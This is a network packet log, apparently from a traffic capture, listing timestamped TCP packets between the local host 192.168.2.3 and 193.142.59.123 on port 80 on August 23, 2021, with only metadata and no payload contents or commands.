Aug 23, 2021 02:08:38.086294889 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086303949 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.086314917 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086335897 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086349010 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086357117 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.086364985 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086380959 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086394072 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086409092 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086414099 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.086426973 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086441994 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086446047 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.086457014 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086476088 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086477995 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.086493015 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086508036 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086524010 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086530924 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.086539984 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086554050 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086559057 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.086570024 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086585045 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086590052 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.086604118 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086621046 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086622953 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.086636066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086652040 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086667061 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086677074 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.086682081 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086698055 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086713076 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086715937 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.086730957 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086746931 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086750031 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.086761951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086776972 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086791039 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086797953 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.086806059 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086821079 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086834908 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086838007 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.086853981 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086869001 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086870909 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.086884022 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086899996 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086915016 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086920977 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.086930037 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086961031 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.086990118 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.117753029 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.117785931 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.117808104 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.117830038 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.117850065 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.117863894 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.117872953 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.117897987 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.117918968 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.117921114 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.117944002 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.117968082 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.117980957 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.117990971 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118011951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118016958 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.118036032 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118057013 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.118057966 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118081093 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118100882 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118103981 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.118123055 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118143082 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118145943 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.118161917 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118174076 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.118179083 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118201017 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118221045 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.118221998 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118246078 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118266106 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.118268013 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118287086 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118303061 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118310928 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.118318081 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118334055 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118338108 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.118350029 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118364096 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118372917 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.118383884 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118400097 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118401051 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.118413925 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118428946 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118443966 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118452072 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.118458986 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118474007 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118489027 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118491888 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.118506908 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118522882 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118537903 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118551970 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118554115 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.118567944 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118586063 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118601084 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118613958 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.118618011 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118640900 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.118668079 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.118891954 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118910074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.118958950 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.153299093 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153335094 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153357029 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153378963 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153398991 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153419018 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153439999 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153460979 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153486013 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153510094 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153529882 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153531075 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.153553009 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153574944 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153595924 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153616905 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153636932 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153662920 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153685093 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153704882 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153727055 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153737068 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.153748035 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153768063 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153788090 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153808117 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153831959 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153853893 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153872967 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153873920 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.153894901 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153914928 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153939962 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.153953075 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153970003 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.153990030 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154007912 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154022932 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154025078 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.154040098 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154057980 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154074907 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154089928 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154105902 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154123068 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154139042 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154154062 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154170036 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154186964 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154203892 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154218912 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154234886 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154252052 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154268026 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154284000 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154305935 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154326916 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154344082 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154355049 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.154362917 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154380083 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154401064 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154421091 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154443026 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154464006 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154484034 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154505968 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154525995 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154534101 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.154550076 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154572010 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154592037 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154613018 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154627085 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.154633999 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154654026 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154674053 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154695034 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154701948 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.154719114 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154741049 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154762030 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154776096 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.154783964 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154804945 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154824972 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154846907 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154858112 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.154867887 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154891968 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154915094 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154934883 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154947996 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.154964924 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154982090 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.154999018 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155006886 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.155019999 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155040979 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155061960 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155071020 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.155081987 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155102015 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155138016 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155158997 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155178070 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155201912 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155222893 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155235052 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.155245066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155266047 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155287027 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155307055 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155328035 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155328035 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.155349016 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155373096 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155394077 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155415058 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155415058 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.155435085 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155456066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155477047 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155487061 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.155498981 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155519962 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.155558109 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.155623913 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.155852079 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.190943956 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.190977097 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191004038 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191029072 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191051006 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191056013 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191073895 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191092968 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191093922 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191127062 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191139936 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191152096 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191160917 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191183090 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191183090 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191203117 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191210032 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191221952 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191241980 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191242933 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191262007 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191262960 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191287041 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191287994 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191308022 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191312075 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191327095 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191339016 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191349030 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191366911 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191368103 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191387892 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191390991 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191407919 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191415071 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191428900 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191447020 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191454887 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191473007 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191478968 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191498041 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191500902 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191519976 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191524029 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191546917 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191548109 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191569090 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191570044 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191591978 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191598892 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191615105 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191625118 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191641092 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191652060 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191665888 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191674948 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191689014 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191708088 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191711903 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191731930 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191739082 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191756010 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191761017 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191781044 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191783905 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191807985 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191807985 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191828966 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191831112 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191853046 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191855907 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191873074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191884995 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191894054 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.191910982 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.191915035 CEST	80	49735	193.142.59.123	192.168.2.3
